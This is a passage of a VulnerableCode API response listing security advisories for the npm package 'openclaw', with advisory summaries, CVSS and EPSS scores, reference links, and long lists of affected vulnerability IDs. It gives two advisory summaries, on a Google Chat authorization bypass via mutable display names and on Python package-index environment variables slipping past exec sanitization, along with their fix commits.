                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "GHSA-q2qc-744p-66r2"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-9yxw-fj1c-tff9"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91406?format=api",
            "vulnerability_id": "VCID-a2p8-ydn6-3bbr",
            "summary": "OpenClaw: Google Chat Authz Bypass via Group Policy Rebinding with Mutable Space displayName\n## Summary\n\nGoogle Chat authorization (authz) bypass via group policy rebinding with a mutable space displayName.\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `<= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nGoogle Chat group authorization previously relied on mutable space display names, so a group policy bound to a display name could be rebound to a different space when a name changed or two spaces shared the same name. Commit `11ea1f67863d88b6cbcb229dd368a45e07094bff` requires stable group IDs for access decisions.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `11ea1f67863d88b6cbcb229dd368a45e07094bff`.\n\n## Fix Commit(s)\n\n- `11ea1f67863d88b6cbcb229dd368a45e07094bff`",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35617",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00065",
                            "scoring_system": "epss",
                            "scoring_elements": "0.20285",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00065",
                            "scoring_system": "epss",
                            "scoring_elements": "0.20323",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00065",
                            "scoring_system": "epss",
                            "scoring_elements": "0.20333",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35617"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/11ea1f67863d88b6cbcb229dd368a45e07094bff",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T20:41:28Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/11ea1f67863d88b6cbcb229dd368a45e07094bff"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-52q4-3xjc-6778",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T20:41:28Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-52q4-3xjc-6778"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35617",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35617"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-group-policy-rebinding-with-mutable-space-displayname",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.2",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-13T20:41:28Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-group-policy-rebinding-with-mutable-space-displayname"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-52q4-3xjc-6778",
                    "reference_id": "GHSA-52q4-3xjc-6778",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-52q4-3xjc-6778"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.28",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-2uqu-k42d-1baq"
                        },
                        {
                            "vulnerability": "VCID-2wr9-h42m-a7ev"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-38g8-39ek-xbat"
                        },
                        {
                            "vulnerability": "VCID-3wsw-d4z2-dydt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-3zx4-t8cj-kbfn"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4hz5-f2pw-3yb4"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-5rgx-2krs-guck"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7dyw-9b37-yqh4"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7wmr-v7zb-6fc9"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-9xrt-mv81-3yc8"
                        },
                        {
                            "vulnerability": "VCID-a2wx-7b8h-c3h1"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-axp9-mt9z-gkgw"
                        },
                        {
                            "vulnerability": "VCID-b9w3-w2nq-cqg6"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-c4yt-z48z-zygv"
                        },
                        {
                            "vulnerability": "VCID-c76v-4577-n7c6"
                        },
                        {
                            "vulnerability": "VCID-carm-gpgh-wbbf"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-cvmw-sxfq-dyhz"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-da47-zdf1-mfgf"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fekn-d6f3-xfa6"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-g3hg-peh1-tudm"
                        },
                        {
                            "vulnerability": "VCID-g8r6-x6s5-uydq"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hd4w-s3dp-nubj"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-j8fb-fhyc-33fu"
                        },
                        {
                            "vulnerability": "VCID-jdqk-kv8u-xqa9"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-kzgh-7f6h-kfd1"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mcz5-wgu1-z7g7"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7me-4bzz-83cm"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-q9jf-srt4-fbcg"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-s3wz-3yzf-ybhz"
                        },
                        {
                            "vulnerability": "VCID-sja9-6t41-hud8"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-t991-75e7-ykdv"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-uy97-p1ex-y7df"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vktg-77tu-vycv"
                        },
                        {
                            "vulnerability": "VCID-vx5d-3d98-7kf3"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-watb-49vx-yub1"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wx44-n3fr-skah"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-x4hn-ygbg-mkep"
                        },
                        {
                            "vulnerability": "VCID-x794-wfnf-1ugf"
                        },
                        {
                            "vulnerability": "VCID-x7uw-s9a6-fybd"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xryt-a83q-q7et"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-xvhd-w4tv-tqhr"
                        },
                        {
                            "vulnerability": "VCID-xz8s-hj5s-wfgj"
                        },
                        {
                            "vulnerability": "VCID-xzg5-ren5-p7gw"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ykwt-tdpa-3bft"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-ynup-4v9e-tbh4"
                        },
                        {
                            "vulnerability": "VCID-yp2w-pc58-9bf6"
                        },
                        {
                            "vulnerability": "VCID-ywrn-52gx-f3ad"
                        },
                        {
                            "vulnerability": "VCID-z7wa-tw2t-vqas"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zb5t-hhkm-kfeh"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zkum-rn42-yyfs"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"
                }
            ],
            "aliases": [
                "CVE-2026-35617",
                "GHSA-52q4-3xjc-6778"
            ],
            "risk_score": 1.9,
            "exploitability": "0.5",
            "weighted_severity": "3.8",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-a2p8-ydn6-3bbr"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89853?format=api",
            "vulnerability_id": "VCID-a2wx-7b8h-c3h1",
            "summary": "OpenClaw: PIP_INDEX_URL and UV_INDEX_URL bypass host exec env sanitization and redirect Python package-index traffic\n## Summary\n`PIP_INDEX_URL` and `UV_INDEX_URL` bypass host exec env sanitization and redirect Python package-index traffic. Because the sanitization step lets these two variables through, a package-management command run via host exec can be made to resolve Python packages from a different index than the one configured on the host.\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: high\n- Assessment: v2026.3.28 still allows Python package-index env redirection through host exec, but scope should stay limited to approved or allowlisted package-management exec paths, not arbitrary remote execution.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `7ae1bb0c7799fd0cbd2d4de7b0f5b8039837ab8d` — 2026-03-31T09:53:32+09:00\n\nOpenClaw thanks @nexrin for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41391",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00018",
                            "scoring_system": "epss",
                            "scoring_elements": "0.04648",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00018",
                            "scoring_system": "epss",
                            "scoring_elements": "0.04661",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00018",
                            "scoring_system": "epss",
                            "scoring_elements": "0.04675",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41391"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/7ae1bb0c7799fd0cbd2d4de7b0f5b8039837ab8d",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "5.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:25:34Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/7ae1bb0c7799fd0cbd2d4de7b0f5b8039837ab8d"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-7ggg-pvrf-458v",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "5.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T14:25:34Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-7ggg-pvrf-458v"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41391",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "7.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "HIGH",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41391"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-environment-variable-bypass-in-package-index-url-handling",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"
                        },
                        {
                            "value": "5.8",
                            "scoring_system": "cvssv4",
